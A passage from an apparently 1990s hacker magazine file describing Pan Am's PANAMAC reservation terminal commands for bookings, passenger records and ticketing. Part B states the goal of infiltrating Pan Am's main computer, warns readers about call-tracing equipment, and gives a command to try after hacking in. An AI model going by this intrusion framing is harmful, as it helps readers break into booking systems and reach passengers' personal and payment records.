  2377. This will cancel the second segment. The Panamac assumes that the flight
  2378. cancelled is going to be replace by another..so therefore the next flight
  2379. one books will become the second segment automatically.
  2380.  
  2381. Response:
  2382.  
  2383. NEXT REPLACES 2
  2384. FLT SEG RELATED FACTS HAS BEEN CANCELED
  2385.  
  2386. To cancel multiple itinerary just enter Function Key  "XITN"
  2387.  
  2388. Response:
  2389.  
  2390. ITIN CNLD
  2391.  
  2392. Alternate Method: Segment Entries
  2393. ---------------------------------
  2394. Sometimes the display is not necessary if you know the flight number,
  2395. Origin - Destination ,CLASS, date, # of seats.This is done by entering
  2396. whats called a "Flight Segment"...so if the flight is available then
  2397. Panamac will confirm the seats to you.
  2398. The "0" key on the keyboard is the "SEG" key.
  2399.  
  2400. For example if you wanted to book 4 seats from Newyork (JFK) to London's
  2401. Hethrow Airportt(LHR) in Premium First Class (P) on 3rd July  FLIGHT 90
  2402. The sales agent would enter:
  2403.  
  2404. >0 PA 90 P 3JUL JFKLHR NN4
  2405.  
  2406. The "0" is the SEGment Identifier.The NN4 means you need 4 seats.
  2407.  
  2408. Erasing all Flights booked:
  2409. ---------------------------
  2410. To ignore all flights booked.The sales agent would enter the IGNORE TRASACTION
  2411. Function Key.This is the key displayed as "IGN".The key is located fifth
  2412. from the right side of the function keys.
  2413.  
  2414. >I
  2415.  
  2416. response:
  2417.  
  2418. ALL TRANSACTIONS IGNORED
  2419.  
  2420.  
  2421.                               Part IV
  2422.                               -------
  2423. Single Connections:
  2424. ------------------
  2425. One has to understand in this that sometimes direct connections are not
  2426. available and therefore a second location must be used.
  2427. There are also second degree connection(also known as double connections)
  2428. In this example, an availability request between LAX(los Angeles) and JFK
  2429. (John F. Kennedy N.Y) requires a connection at a single city. It would look
  2430. like this:
  2431.  
  2432. >A 20APR LAXJFK P [This is just an eg. In reality there is a connection]
  2433.  
  2434. Output:
  2435.  
  2436. SVC NOT AVAILABLE IN THE SYSTEM
  2437. %2 or #2
  2438.  
  2439. This response obviosly means that there  is no connection going between
  2440. these two points.But after that you may get a percent followed by the month
  2441. or a number sign followed by the year. This (%) means that the service is going
  2442. to be offered in 2 months in this case or same applys for the year which is the
  2443. (#).
  2444.  
  2445. Therefore the agents have to know how to connect flights. They do supply them a
  2446. connection availablity chart on the side.
  2447. So lets say (just as an eg.) that there is a direct connection from the
  2448. airport in San Francisco(abb. SAN) to JFK and theres also a connection between
  2449. SAN to LAX.Then obviously SAN is used as a connecting airport.Therefore the
  2450. agent would enter:
  2451.  
  2452. >A 20APR LAXJFK P / 1 SAN 100 / 1
  2453.  
  2454. A 20APR LAXJFK P - This is a regular entry[See above for more on it]
  2455.  /  - This slash has to be be there a separator(compulsory).Also shows
  2456.       connection is to be made somewhere
  2457.  1  - O.k this will be different as in 3 cases below:
  2458.       1 - When you are sure that Pan am operates that particular route.
  2459.       2 - When sure that Pan am does not travel that route or
  2460.       3 - When not sure which one travels that route.
  2461.  SAN  - This is the first connector.
  2462.  100  - Minimum connection time allowed at the airport.
  2463.  /  - Second slash as a separator also compulsory
  2464.  1  - This entry is for the airline you are connecting to in this case its
  2465.       Pan Am.Use the third entry chart provided in the above eg.
  2466.  
  2467. Second Degree Connection[DOUBLE CONNECTIONS]:
  2468. -------------------------------------------
  2469. All one must do in this case is just add the another connection after the
  2470. single connection in the same form.So therefore in the above case if one wants
  2471. to go from LAX to JFK .He would have to go from:
  2472.  
  2473. LAX --> SAN -->[another connector airport] --> final destination JFK
  2474. --------------------------------------------------------------------
  2475.  
  2476. NOTE: PANAMAC cannot construct connections at a city if it entails connections
  2477. bettween different airports, i.e it cannot construct a connection if the
  2478. arrival is not LaGuardia(LGA) and departures is from JFK or arrive at CDG
  2479. and depart ORY .....Just imagine the havok it would create if one could do that
  2480. ?
  2481.  
  2482. Flight Information:
  2483. ------------------
  2484. PANAMAC provides the capability to display Flight/Arrival Departure Info
  2485. more commonly known as "FLIFO".FLIFO may be requested from the entire sequence
  2486. or for the selected broadpoint in an entry:
  2487. For example:
  2488.  
  2489. >2 PA 50  F 2APR MCO
  2490.  
  2491. 2 - This is the FLIFO action code
  2492. PA 50 - is the flight number
  2493. F - This is the letter used for request departure/arrival info from selected
  2494.     city.
  2495. 2 APR - The date of the departure.
  2496. MCO - is the broad point
  2497.  
  2498. Output will be:
  2499.  
  2500. 2 PA50F 2APR MCO
  2501. /MCO OFF 1529 MIA IN 1611 AN ON TIME ARRIVAL
  2502. /MIA OFF 1847 LHR IN 0733
  2503.  
  2504. This first entry would read as follows: Pan Am flight PA 50 departed at
  2505. 1529 from MIA and arrived at 1611 - Will indicate on time and so on.
  2506.  
  2507. To request FLIFO for a selected broad point, Enter
  2508.  
  2509. 2 PA50 A 4DEC LHR
  2510.  
  2511. A - This is the request for ARRIVAL/DEPARTURE info at the city in entry
  2512. 4 DEC - The arrival date
  2513. LHR - London Hethro Airport which is the arrival city.
  2514.  
  2515. Output:
  2516.  
  2517. 2 PA50 A 4DEC LHR
  2518. /MIA OFF 1847 IN 0733
  2519. /LHR OFF 1150 FBU IN 1488
  2520.  
  2521.                              Part V
  2522.                              ------
  2523.  
  2524. Open Flights:
  2525. -------------
  2526. Often people who are not sure (or not stable:=)) will keep there flight open.
  2527. This has to be instructed into the Panamac.
  2528.  
  2529. Suppose the agent has made an entry of:
  2530.  
  2531. >1 PA 56 P 19APR LAXJFK HS1 1200 1600
  2532.  
  2533. The HS1 means that he has booked 1 seat as explained above also.
  2534. Here in the example the passenger wants a round trip ticket first class
  2535. an "open" return.Therefore it would be:
  2536.  
  2537. >0 PA 56 P JFKLAX QQ1
  2538.  
  2539. 0 - Is the segment id (actually for the open)
  2540. PA - the ailine code
  2541. 56 - is the flight number
  2542. P - is the class
  2543. QQ1 - This is the action code.Compulsory for the open flight booking
  2544.  
  2545. Response:
  2546.  
  2547. 2 PA 56 P JFKLAX QQ1
  2548.  
  2549. This has actaully booked a round trip ticket from JFK - LAX "Open"
  2550.  
  2551. Schedule Displays:
  2552. ------------------
  2553. Sometimes it is necessary to display which airlines fly a particular route
  2554. when not sure.
  2555. Suppose the agent wanted to find out the all the airline that travel at a
  2556. particular date from LAX to JFK then the entry would be:
  2557.  
  2558. >S 19APR LAXJFK  A
  2559.  
  2560. S - Entry for the (S)chedule
  2561. 19APR - Date
  2562. LAXJFK - Self exp.
  2563. A - Time ,here A.M (could be also P for P.M or N for noon)
  2564.  
  2565. Output:
  2566.  
  2567. 19APR-SUN-
  2568. 1TW 747 FYBQM  LAXJFK 1200 1400 73S 0 111
  2569. etc...
  2570. etc...
  2571.  
  2572. In cases where theres is service only once or twice a week between 2 cities,
  2573. you might have to make more than one entry to request a schedule display.
  2574.  
  2575. Eg:
  2576.  
  2577. >S 1APR LHRSAN
  2578.  
  2579. (Do not enter time because you want  24 <--day-->24 explained later)
  2580.  
  2581. Output:
  2582.  
  2583. NO MORE FOR DISPLAY LHRSAN
  2584.  
  2585. o.k this mean that there is no service between these 2 points on the day
  2586. requested.O.k the PANAMAC scans this 24 hours before and 24 hours after
  2587. the date and time.This means that it has already scanned 3 days.So the next
  2588. entry would be:
  2589.  
  2590. >S 3FEB LHRSAN
  2591.  
  2592. But if there is no flight offered between the 2 points then the system would
  2593. reply:
  2594.  
  2595. SVC NOT IN SYS
  2596.  
  2597. Arrival not Known(ARNK)
  2598. -----------------------
  2599. Suppose a passenger was flying from LAX to JFK then he/she decides to take a
  2600. bus from JFK to maybe CVA (Cincinati) then from there return to LAX. This would
  2601. be considered "Arrival Not Known" (ARNK). Lets say a passenger booked a flight
  2602. from LAX to JFK
  2603.  
  2604. 1 PA 747 Y 10APR LAXJFK HS3 1200 1600
  2605.  
  2606. His route from JFK to CVA is not known. Therefore this will require the ARNK
  2607. function key. The entry would be:
  2608.  
  2609. >0 A (or the ARNK function key)
  2610.  
  2611. Output:
  2612.  
  2613. 2 ARNK
  2614.  
  2615. Then lets assume that you have booked a return flight from CVA back to LAX then
  2616. if you list your Itinerary it would look like:
  2617.  
  2618. 1 PA 747 Y 10APR LAXJFK HS3 1200 1600
  2619. 2 ARNK
  2620. 3 PA 745 Y 20APR CVALAX HS3 1700 2100
  2621.  
  2622. Inserting Segment Entries:
  2623. --------------------------
  2624. Mant times its necessary to Insert Segment while booking flights. Suppose a
  2625. person is flying from Albany (ALB) to Miami (MIA) and back. His segment would
  2626. look like:
  2627.  
  2628. 1 PA 747 B 5ARP   ALBMIA HS1 100 445
  2629. 2 PA 747 B 10APR  MIAALB HS1 1200 1545
  2630.  
  2631. Here the passenger is sure that he will return back to ALB on the 10 of APR no
  2632. matter what. Now he may proceed to book the rest of the mid flight he wishes to
  2633. take. So therefore after landing in Miami he wishes to fly to Orlando.Its
  2634. airport code is MCO for Mc Coy Int. Now the sales agent has to make insert a
  2635. segment after the first one.
  2636.  
  2637. Here is how it done:
  2638.  
  2639. >/  1  [ Means Insert after segment #1]
  2640.  
  2641. / - Symbol used to specify "Insert After Segment" Use the "/" or "IAS" key
  2642. 1 - The Segment #.
  2643.  
  2644. The Panamac will respond  with " NEXT FOLLOWS 1 ". This indicates that your
  2645. next entry will be after 1. After Inserting segments a "*I" is necessary to
  2646. renumber the segs. Also if you want to insert a segment before 1 then enter
  2647. (/ 0).
  2648.  
  2649.  
  2650.                               Part VI
  2651.                               -------
  2652. Inputing Name Entries:
  2653. ----------------------
  2654. After the flights have been booked the second part is to input all the names
  2655. of the persons who are travelling.
  2656. O.k lets say 3 people were travelling together (Tom,Bill,Cathy and assuming
  2657. that their family name is Doe)
  2658. The entry that is made into the Panamac would be as follows:
  2659.  
  2660. > -4  DOE / BILL MR / CATHY MRS / TOM MSTR
  2661.  
  2662. " - "  - The name entries has to start with a dash.
  2663. 3 - Is the number of people travelling
  2664. DOE - Family name
  2665. /  - slashes are compulsory to separate names
  2666. BILL MR - bill first name and Mr. is self exp etc..
  2667.  
  2668. **Note SPACING IS NOT NEEDED **
  2669.  
  2670. The good thing about the Panamac is that the agent can assign up to 17 titles
  2671. to person which are aleardy hard core programmed:
  2672.  
  2673.   COL.
  2674.   GEN.
  2675.   DR.
  2676.   LCDR.
  2677.   CPT.
  2678.   LTCOL.
  2679.   MR.
  2680.   MRS.
  2681.   MS.
  2682.   STR.
  2683.   MISS.
  2684.   LT.
  2685.   SGT.
  2686.   ADM.
  2687.   MAJ.
  2688.   REV.
  2689.   CDR.
  2690.  
  2691. Yes Pan Am carries more military personnel than anyother airlines which by the
  2692. way is a true fact. All other titles are just spelled out.
  2693.  
  2694. The name entries are counted after the first "/" for the NN3 in our case.
  2695. ( NN3 as mentioned above means Needed 3)
  2696.  
  2697. However there is an easy to do this by using the "End Item" key which comes
  2698. out on the screen as an equal sign with a vertical bar across it. Its just
  2699. like the IBM ACII VALUE 216. Therefore intread of entering (<C/R>) the agent
  2700. would just use this key and continue his/her entries for eg:
  2701. Use "!" at home.
  2702.  
  2703. >-1SMITHS/JOHN MR  @-1JOHNSON./CATHY MRS
  2704.  
  2705. The "@" represents the "End Item" Key only in our case.
  2706.  
  2707. Infant Names:
  2708. -------------
  2709. O.k Infant names are not booked into the Panamac but only entered. Infant
  2710. entries are ignored by stating it.This is done by entering a "I/".
  2711. Then the # of the Infant eg.
  2712.  
  2713. >-I / 1 JOHNSON / TWEETY MISS
  2714.  
  2715. Item Number / Passenger Number :
  2716. --------------------------------
  2717. Every persons are assigned an Item and Passenger number. Well it would be more
  2718. correct to say passengers.
  2719. Lets look at this entry:
  2720.  
  2721. -2SMITH/TOMMR/KATHYMS@-3JOHNSONS/DAVEMR/MICHELLEMS/JODYMRS
  2722.  
  2723. Now to display the name field the agent would enter "*N"
  2724.  
  2725. Output:
  2726.  
  2727. 1.2SMITH/TOMMR/KATHYMS 3.3JOHNSONS/DAVEMR/MICHELLEMS/JODYMRS
  2728.  
  2729. Here 1.2 means - 1 is the Item Number assigned and 2 is the number of the
  2730. passengers etc.
  2731. There is a reason why the Item numbers is not consecutive. Its because there
  2732. are 2 names in the first entry then obviously 3 follows as the next item number
  2733. . Also in this case the infant entries are also assigned a number.
  2734.  
  2735. Changing name entries:
  2736. ----------------------
  2737. Sometimes its necessary to change names in the entries.This is done by the
  2738. "Change" key  then just retyping the whole entry example:
  2739.  
  2740. 1.2SMITHS/JOHBMR/MARYMRS
  2741.  
  2742. To chnage "Johb" to "John" the agent would enter:
  2743.  
  2744. -1 (Change key) 2SMITHS/JOHNMR/MARYMRS
  2745.  
  2746. Deleting entries is very simple.All the agent has to do is enter the Item #
  2747. and the Change Symbol (By the way the change symbol looks a square and
  2748. diagonals crossed in it.) and then press enter. From home you may use the "*"
  2749. and will work the same. So how does one delete one name from the an entry. That
  2750. question I will leave up to you guys to figure out.(Hint: Use the Passenger
  2751. number)
  2752.  
  2753. Inserting entries can be done in almost the same way by entering the
  2754. passenger number then the entry eg:
  2755.  
  2756. >-/1 -SMITH/CATMR
  2757.  
  2758. The first slash means "Enter after"..In our case the passenger #1.
  2759.  
  2760.  
  2761.                              Part VII
  2762.                              --------
  2763.  
  2764. Completing the Passenger Name & Record (PNR):
  2765. ---------------------------------------------
  2766. The whole booking is not yet complete. The sales agent still have to fill three
  2767. important entries to complete the PNR.These are:
  2768.  
  2769. 1) By who was the booking RECEIVED(passenger,militaty,T.agency,Company etc.)
  2770. 2) The TELEPHONE abb. output is "FONE"
  2771. 3) When the TICKETS will be issued
  2772. 4) Remarks
  2773. 5) The age of child if there's one travelling
  2774.  
  2775. The first three are mandatory to complete the PNR. Numbers 4 & 5 are optional
  2776. but the agents are encouraged to fill them out just for the records.
  2777. lets take a looks at the three mandatory ones. This article wont go over the
  2778. optional ones.
  2779.  
  2780.     RECIEVED:
  2781.     ---------
  2782. This field as stated clearly above identifies the party who made the booking.
  2783. The characters cannot exceed over 19.The entry should always begin with a
  2784. "6".This hardcored to interpret the recieved entry.Then comes the name of the
  2785. person. For example:
  2786.  
  2787. >6 MR DAVIS
  2788.  
  2789. The title always has to come first in case unlike inputing name entries.
  2790. Lets say if Mr. Davis worked for the American Travel Agency.Then the entry
  2791. is specified as follows:
  2792.  
  2793. >6 MR DAVIS/AMERICANTR
  2794.  
  2795. To Display the Passenger Data - Use "* P"
  2796. And the Output of the Eg. above would look like:
  2797.  
  2798. RCVD/RLOC-MR DAVIS/AMERICANTR
  2799.  
  2800. RCVD - Received
  2801. RLOC - Record Locater  and then the name.
  2802.  
  2803. Changing these entries is done by the CHANGE key using the same principal
  2804. of changing name entries.In this case use the field "6" then input change
  2805. symbol then retype the name.
  2806.  
  2807.  
  2808.     TELEPHONE:
  2809.     ----------
  2810. The harcored field used here is "9" not "6".
  2811. This information is entered by first typing a 9 then the "Source Of Booking"
  2812. (SOB) [See table provided for this entry]
  2813. Then a mandatory "*" sign. The SOB relates to the 6th field as we will see.
  2814. Then comes the Phone number.
  2815. If a passenger (D) booked a flight the letter "H" for Home or "B" is followed
  2816. by the telephone number and if its an agency/commercial/Interline then the
  2817. name is used.
  2818.  
  2819.                             S.O.B Table:
  2820.                             ------------
  2821.         Direct (Passenger) - 9 D *     Military        - 9 G *
  2822.         Government         - 9 G *     Commercial      - 9 C *
  2823.         Travel Agent       - 9 A *     Interline       - 9 I *
  2824.  
  2825. Lets say you booked a flight and your phone number was 7185551234 and that was
  2826. your business number, the Entry made would be:
  2827.  
  2828. >9 D *  718/5551234 B
  2829.  
  2830. If the "*P" is invoked then it would display :
  2831.  
  2832. RCVD/RLOC -MR DAVIS
  2833. FONE-NYC-A 718/5551234 B
  2834.  
  2835.  
  2836. The "FONE" serves to indicate the Telephone field. The the NYC has nothing to
  2837. do with the NPA of the passengers phone number but it indicates the city
  2838. location of the Panamac set where the booking was made. The "A" after the NYC
  2839. is taken from the S.O.B table.
  2840.  
  2841. Passenger Relating:
  2842. -------------------
  2843. The first entry in the FONE field always belongs to the person/company/
  2844. Travel agency etc in the RCVD field. You can enter additional phone numbers
  2845. using the same format as the first FONE entry. On additional entries,you must
  2846. specify which passenger or passengers the phone number is for. This is done by
  2847. including in the FONE entry the PASSENGERS NAME NUMBER of the person(s)
  2848. who can be reached at that phone. This proccess is called PASSENGER RELATING
  2849.  
  2850. Lets say we have the entry:
  2851.  
  2852. 1.2SMITH/JOHNMR/MARYMRS
  2853. 1 PA 56 B 19APR JFKLAX HS2 600 1000
  2854. RCVD/RLOC-AMERICAN TR. AGENCY
  2855. FONE-NYC-A 718/555-1234 H
  2856.  
  2857. The Smiths, John  & Mary have the same home fone number.Therefore passenger
  2858. 1-2 have the same #s.This has to be specified into the PANAMAC by:
  2859.  
  2860. >9 1-2 A*  718/555-4321 H
  2861.  
  2862. To display NAME,ITINENARY,RCVD AND FONE at the same time enter:
  2863.  
  2864. >*R (Record)
  2865.  
  2866. Output:
  2867.  
  2868. 1.2/SMITH/JOHNMR/MARY COL
  2869. 1 PA 56 B 19APR JFKLAX HS2 600 1000
  2870. RCVD/RLOC-AMERICAN TR. AGENCY
  2871. FONE-NYC-A 718/555-1234 American Tr.Agency
  2872. 2.1-2 NYC-A 718/555-4321 H
  2873.  
  2874. etc...
  2875.  
  2876. Changing entries is a simple task. Lets assume the sales agent wants to change
  2877. the first FONE entry which is for the Travel Agency.The command would be:
  2878.  
  2879. >9 1 (Change Symbol) A*  [FONE number & and the name of the agency]
  2880.  
  2881. 9 - fone entry
  2882. 1 - First entry.(2.)would be the second FONE entry which is the Passenger home
  2883.     fone number.( If there was a third entry it would start with (3.) and so
  2884.     on..
  2885. A* - From  SOB
  2886.  
  2887. Deletion of the entries I will leave you to figure out.
  2888.  
  2889. Address Entries & Payment:
  2890. --------------------------
  2891. The Address entries and the form of payment are included in FONE entry as
  2892. well. This was the Info is stored in the PNR until the time of ticketing.
  2893.  
  2894.  
  2895. Address: [Use same format]
  2896.  
  2897. >9 1-2 C* 42-95 ELM STREET / FLUSHING N.Y 10011
  2898.  
  2899. Payment:
  2900.  
  2901. >9 D * AX 1234 567 11111 EXP 9/90 MR DAN DAVIS
  2902.  
  2903.  
  2904. Ticket Entries:
  2905. ---------------
  2906.  
  2907. The Entries in the Ticketing field tell us if the passengers already has a
  2908. ticket or when and how its going to be issued.(Mail etc.) or when its going to
  2909. be cancelled.A ticketing code is issued for these situations:
  2910.  
  2911.                         Ticket Codez
  2912.                         ------------
  2913.          W - Here ticket will be issued on the date entered. Passenger will
  2914.              pick it up on that date.
  2915.          U - The ticket is mailed here(TBM) on date entered
  2916.          Q - Here the ticket will be given by the travel agency on date entered
  2917.          O - Ticketed
  2918.  
  2919. The field used here is "7" hardcored for Ticketing purposes.
  2920.  
  2921. Typical entry:
  2922.  
  2923. >7 W APR19
  2924.  
  2925. Usually one day after is added to APR19 so that passenger has the whole day
  2926. to purchase the ticket. The entry then would look like:
  2927.  
  2928. >7 W APR20 * APR 19
  2929.  
  2930. The "*" is mandatory.
  2931.  
  2932. Mailing:
  2933. -------
  2934. Lets look at an example of TBM:
  2935.  
  2936. >7 U 19ARP * CK FOR CHECK
  2937.  
  2938. This is entered when waiting for the passengers check to arrive. On 19APR its
  2939. checked for arrival. If arrived then the tickets are mailed. If check is not
  2940. received then tickets are not mailed.
  2941.  
  2942. If the payment is made by a Credit Card then entry is:
  2943.  
  2944. >7 U 19APR * CC
  2945.  
  2946. This agent will refer to the fone field where the CC info is stored. Here the
  2947. ticket is mailed on the date issued.
  2948.  
  2949. Outside U.S travel agencies are given a Ticket Time Limit. The entry is:
  2950.  
  2951. >7 Q 5MAY
  2952.  
  2953. When showing PNR ticketed with the letter "O". Its not necessary to enter
  2954. a date, as the Panamac already enters it that the reservation is being ticketed
  2955. Enter:
  2956.  
  2957. >7 O [assume that the date today is 5may]
  2958.  
  2959. PANAMAC will display:
  2960.  
  2961. TKT-O 17APR NYC  000 [SINE OF THE AGENT WHO MADE THE ENTRY]
  2962.  
  2963. TKT-O - IS THE TICKET CODE
  2964. 17APR - TODAYS DATE
  2965. MYC - PANAMAC SET LOCATION
  2966. 000 - SEPARATOR
  2967. [  ] - SINE OF THE AGENT
  2968.  
  2969. If all passengers are having thier tickets issued at the same time and place,
  2970. passenger relating is not necessary. But, if the passengers have different
  2971. dates or ticketing arrangements then the entries must be made separately and
  2972. Passenger Name Related.
  2973.  
  2974. For eg. Assume there are 3 passengers on the PNR. Passenger 1 and 2 will call
  2975. for their tickets at the Pan Am office and June 3. Passenger 3 wants his ticket
  2976. mailed on June 6 and will pay by personal check. The entries are:
  2977.  
  2978. >7 1-2 W 3JUN
  2979. >7  3 U 6JUN * CK FOR CHECK
  2980.  
  2981. Output:
  2982.  
  2983. TKT-1-2 W03JUNNYC000[SINE OF AGENT] 2.3 U0JUNNYC000[SINE OF AGENT] CK FOR CHECK
  2984.  
  2985. Here the 1-2 is the first entry related to the passengers 1 & 2 and 2.3 is the
  2986. second entry related to passenger 3
  2987. NYC - location of P.set
  2988.  
  2989. Change/Delete :
  2990. ---------------
  2991. Suppose the display for the ticket field was:
  2992.  
  2993. TKT-W08APRLAX000BS
  2994.  
  2995. Here the ticket will be issued on the 8th of APR. The Panamac set is located
  2996. in LAX(Los Angeles). Also after the sepater (000), the BS is just an example
  2997. of a SINE of the agent.
  2998.  
  2999. Lets assume today is 7th of APR and the passenger has come to pick it up.
  3000. The agent has to instruct the PANAMAC that its TICKETED. Therefore he/she
  3001. would enter :
  3002.  
  3003. >7 1 (Change Symbol) O
  3004.  
  3005. Here:
  3006. 7 - This is the field of the ticketing
  3007. 1 - is the entry number
  3008. O - New Information
  3009.  
  3010. One has to remember that if changing related TKT entry then just enter
  3011. Passenger Name number after the Change Symbol. Then the new Inforamtion. It may
  3012. look like "7 1 (Change Symb.) 1-2 W 19APR"
  3013. To delete an entry just enter Field , Entry # then the Change Symb.
  3014.  
  3015. End Trasaction:(ET)
  3016. -------------------
  3017. The PNR is now complete. After completing it the agent must End Transaction
  3018. (ET).This key is located as one of the function keys.
  3019.  
  3020. >ET
  3021.  
  3022. Output:
  3023.  
  3024. A OK 4SW#32G
  3025.  
  3026. The 4SW#32G is called the RAD NUMBER or RECORD LOCATER or PNR ADDRESS.
  3027. After Ending Trasaction the PANAMAC will send a message to all the airline
  3028. in the Itinenary advising them of the flights the agents have booked/requested
  3029. and name of passenger.
  3030.  
  3031. SHELL PNRS
  3032. ----------
  3033. Some records like travel agencie's accounts, corporate accounts and thier FT
  3034. number, Tel #, Address etc. have to be stored
  3035. permanently in the PNR. Therefore Panamac has what called SHELL PNRs.
  3036. Here file will become a permanent and reusable record.
  3037.  
  3038. A shell PNR can be retrieved by the account number, Telephone number and
  3039. ARC (Airline Reporting Corporation) or IATA(International Air Transport
  3040. Association). The ARC/IATA use last 5 Digits numeric plus check digit
  3041. The entry to display a shell PNR before beginning normal PNR creation
  3042. begins with the letters "RP" then a "*" then comes the Account Number.
  3043. Example:
  3044.  
  3045. >RP*7183589901
  3046.  
  3047. Ouput would be:
  3048.  
  3049. NYC PA A QH 24FEB88 2034
  3050. NO NAMES
  3051. NO ITIN
  3052. FONE-NYC-A 718/358-9901/*ARC 413453
  3053. 2.NYC-A AMERICAN
  3054. TKT-024FEBNYC000BS DKIR
  3055. RMARS-*
  3056.  
  3057. The Itinenary may now be booked and the PNR completed as usual. Shell PNRs
  3058. may also be retrieved using the following entries:
  3059.  
  3060.    ARC/ATC # - RP*ATC494340 [use last 5 numbers numeric plus check digit]
  3061.    IATA # - RP*ITA945934 [Also use last 5 numeric plus D.C]
  3062.    Account Code Number - RP*ACN7734 (In some countries only]
  3063.  
  3064. Shell PNRs can be merged with PNRs by just entering a "M" after the RP.
  3065.  
  3066. Retreiving a PNR:
  3067. -----------------
  3068. After the sales agent completes a PNR. It is sent to the Master Computer at
  3069. Rockleigh,N.J. To retreive a PNR  , enter "*" and the PNR ADDRESS or by using
  3070. the flight,date and boarding off and on points and name of passenger eg:
  3071.  
  3072. >* PA 56/10AUG MIANYC - DAVIS
  3073.  
  3074. The hyphen is mandatory here.
  3075.  
  3076. The Panamac's output will be:
  3077.  
  3078. PA56/10AUG MIANYC - DAVIS
  3079. 01 3DAVIS/TOMMR/CATHYMRS/FIFIMS
  3080. 02 1DAVIDSON/SHASHI
  3081. :
  3082. etc
  3083. :
  3084.  
  3085. To retrieve the entries just choose the line number then enter:
  3086.  
  3087. >*2
  3088.  
  3089. The "*" has to be there or errors will ocurr. [No comand probably]
  3090. Anyway the "*2" will give you the account for Davidson.
  3091.  
  3092. To cancel a PNR you retrive just enter the "IXTN" in the fuction keys.
  3093.  
  3094. END OF PART A
  3095. -------------
  3096.  
  3097.  
  3098. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3099. =               P/HUN Issue #3, Volume #2: Phile #6 of 11                     =
  3100. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3101.  
  3102.  
  3103.               /X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
  3104.               X                                                  /
  3105.               /   The Pan Am Airline Computers (c)1994 "PART B"  X
  3106.               X   ---------------------------------------------  /
  3107.               /                                                  X
  3108.               X                  By  Red Knight                  /
  3109.               /                                                  X
  3110.               X    A P/HUN Magazine Incorporation Productions    /
  3111.               /                                                  X
  3112.               X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/
  3113.  
  3114.  
  3115. Introduction & clearing up a confusion
  3116. --------------------------------------
  3117.  
  3118. Welcome to Part B of "The Pan-Am Airline Computers". I hope you have found the
  3119. first part intresting.
  3120.  
  3121. I would like to take this opportunity in clearing up a minor confusion that
  3122. some of you may have while reading the first part of this file.
  3123.  
  3124. There are 2 types of systems I talk about in the first part which are:
  3125.  
  3126. o  Pan-Am main computer  &
  3127. o  The Panamac or PANAMAC
  3128.  
  3129. The Pan-Am main computer is used to store and view performance of the entire
  3130. network. Pan American has 3 main computer systems to serve the surrounding
  3131. states. These are located in Florida, Washington and NewJersey. There may
  3132. exsist one in California but we dont have enough proof to be sure.Although they
  3133. may have smaller terminals connected to these 3 major terminals and all the
  3134. material that is covered here also applies for these smaller terminals.
  3135. The Panamac are computers that are used by sales agents to book flights, give
  3136. information and the works. Although the Pan-Am main computer can also handle
  3137. all the tasks that the PANAMAC can. Here is what the the Pan Am network looks
  3138. like:
  3139.  
  3140.  
  3141. Example of a simplified Pan Am Network
  3142. --------------------------------------
  3143.  
  3144.                                  Cartridge & The Panamacs will be in the same
  3145.                                   building. Like the major Pan Am building
  3146.                                   in Manhatten in Newyork.
  3147.                              _____________________________________________
  3148. Sub Terminals               |                                             |
  3149.      |   +------ & Other                       +---- Panamac
  3150.  +-------|-+  airlines       ______________    |---- Panamac
  3151.  | Pan-Am  |  +----------+  +              +   |---- Panamac    Sales Agents
  3152.  |  main   |--|  Sub     |--|Cartridge Area|---|---- Panamac   on each terminal
  3153.  | computer|  | Terminal |  +______________+   |---- Panamac
  3154.  +---------+  +----------+                     |---- Panamac
  3155.      |   |______________                       +---- Panamac
  3156.  Sub Terminal        Other Agencies
  3157.  
  3158.  
  3159. The cartridge area is where they insert physical cartridges for new rates
  3160. of travelling, new routes , cancellation of rountes etc. The Panamac uses
  3161. all this information supplied by the cartridge area so that the Sales agents
  3162. can answer our various questions and book us flights. The cartridge area
  3163. contains the main program for the Panamac's to run. All the information from
  3164. the cartridge area is passed to the sub terminal then to the main computer
  3165. The surrounding states may connect to one or many sub terminals then finally
  3166. leading to the main computer. Our main purpose here is to infiltrate the main
  3167. computer where all the information is stored and has control over the entire
  3168. network that it serves. I have heard from employees that Pan-Am has the latest
  3169. on ANI equipment and therefore please proceed with caution.
  3170.  
  3171. Another thing is that when you have successfully hacked the system and you dont
  3172. get the SOM ">" prompt then type in ">SOMTERM" and hopefully you will
  3173. end up with the SOM.
  3174.  
  3175. I hope this has cleared the confusion and now lets continue.
  3176.  
  3177.  
  3178.                                Part VIII
  3179.                                ---------
  3180.  
  3181. Host Facts
  3182. ----------
  3183. The Host facts field contains 2 types of entries:
  3184.  
  3185. Other Service Information (OSI) entries which give information about passenger
  3186. so that they can be offered proper assistance or recognition.
  3187.  
  3188. A passengers speaks (SPKS) only a language other than English or Meet and
  3189. assist (MAAS) and this passenger is elderly and needs assistance.
  3190.  
  3191. Into the OSI goes anything pertinent from age to language, that they should
  3192. know in order to talk to the passwngers as an individual.
  3193.  
  3194. All the entries in the FAX field begin with digit 4. The code "PA" os used
  3195. to send message to Pan Am only, This special information is entered as follows:
  3196.  
  3197.  
  3198. >4 OSI PA_MAAS PSGR ELDERLY ASSIT IN TRANSIT
  3199.  
  3200. A space is madatory only after PA then free form test is permitted. OSI
  3201. information will be transmitted to the airport so that the appropriate action
  3202. may be taken. In addition, special 4 chracter codes are to be used if the OSI
  3203. details are to be taken transmitted directly to the airport check system.
  3204.  
  3205. >4 OSI PA SPKS SPANISH ONLY
  3206. >4 OSI PA FRTV PA62634678J-STARK/AMR
  3207.  
  3208. If the passenger's description does not match one of the codes listed in the
  3209. system enter the information as free form test after the
  3210. "PA"
  3211.  
  3212. For eg.
  3213.  
  3214. >4 OSI OA VIP MAYOR OF N.Y
  3215.  
  3216. In addition there is a special format to indicate that a passenger is an infant
  3217. (INF) which include the age indicated in months (1yr=12MTS)
  3218.  
  3219. For eg.
  3220.  
  3221. >4 OSI PA INF DAVIDSON/JR MSTR 5MTHS
  3222.  
  3223. Note: If there are two or more infants traveling, seperate OSI entries must
  3224. be made for each other
  3225.  
  3226.                                 Part IX
  3227.                                 --------
  3228.  
  3229. Special Service Requirements (SSR) entries which require prior arrangements
  3230. for something special to be provided to the passenger at the airport or on
